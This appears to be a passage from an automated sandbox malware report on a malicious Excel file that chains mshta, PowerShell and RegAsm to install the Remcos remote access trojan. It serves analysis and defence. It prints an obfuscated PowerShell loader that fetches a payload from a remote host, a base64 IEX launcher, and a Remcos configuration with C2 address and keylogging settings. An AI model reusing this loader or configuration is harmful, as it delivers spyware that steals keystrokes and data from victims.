[dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
                  Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Temp\jdevsgkx.xgo.ps1

                  Data Obfuscation

                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", ProcessId: 3760, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 1884, TargetFilename: C:\ProgramData\remcos\logs.dat
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-10-14T11:05:44.110820+0200 | 2024197 | 1 | A Network Trojan was detected | 192.3.220.40 | 80 | 192.168.2.22 | 49162 | TCP
                  2024-10-14T11:05:46.327953+0200 | 2024197 | 1 | A Network Trojan was detected | 192.3.220.40 | 80 | 192.168.2.22 | 49164 | TCP
                  2024-10-14T11:05:44.110782+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49162 | 192.3.220.40 | 80 | TCP
                  2024-10-14T11:05:46.327952+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49164 | 192.3.220.40 | 80 | TCP
                  2024-10-14T11:06:06.412128+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49171 | 192.3.220.40 | 80 | TCP
                  2024-10-14T11:06:09.576932+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 192.3.220.40 | 80 | 192.168.2.22 | 49172 | TCP
                  2024-10-14T11:06:25.520311+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 192.3.220.40 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-10-14T11:06:09.576932+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 192.3.220.40 | 80 | 192.168.2.22 | 49172 | TCP
                  2024-10-14T11:06:25.520311+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 192.3.220.40 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-10-14T11:06:13.282795+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49173 | 135.148.195.248 | 6875 | TCP
                  2024-10-14T11:06:14.272151+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 135.148.195.248 | 6875 | TCP
                  2024-10-14T11:06:08.509149+0200 | 2049038 | 1 | A Network Trojan was detected | 185.199.108.133 | 443 | 192.168.2.22 | 49167 | TCP
                  2024-10-14T11:06:24.551621+0200 | 2049038 | 1 | A Network Trojan was detected | 185.199.108.133 | 443 | 192.168.2.22 | 49176 | TCP
                  2024-10-14T11:06:14.702051+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.22 | 49175 | 178.237.33.50 | 80 | TCP

                  AV Detection

                  Source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: 037002451082_10142024.xls, Virustotal: Detection: 7%
                  Source: Yara match, File source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 1884, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR
                  Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: 037002451082_10142024.xls, Joe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 24_2_00404423 FreeLibrary,CryptUnprotectData,24_2_00404423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 31_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,31_2_004338C8
                  Source: powershell.exe, 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----, memstr_c70d7686-4

                  Exploits

                  Source: Yara match, File source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 31_2_00407538 _wcslen,CoGetObject,31_2_00407538
                  Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknown, HTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49169 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49170 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.pdbhP\ source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.pdb source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.pdb source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.pdbhP\ source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040AE51 FindFirstFileW,FindNextFileW,24_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 25_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,25_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,26_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00407877 FindFirstFileW,FindNextFileW,31_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0044E8F9 FindFirstFileExA,31_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
                  Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global traffic DNS query: name: jfm.com.co
                  Source: global traffic DNS query: name: raw.githubusercontent.com
                  Source: global traffic DNS query: name: idabo.duckdns.org
                  Source: global traffic DNS query: name: geoplugin.net
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 150.136.81.248:443
                  Source: global traffic TCP traffic: 192.168.2.22:49176 -> 185.199.108.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 192.3.220.40:80
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 192.3.220.40:80
                  Source: global traffic TCP traffic: 192.168.2.22:49175 -> 178.237.33.50:80
                  Source: global traffic TCP traffic: 192.168.2.22:49177 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
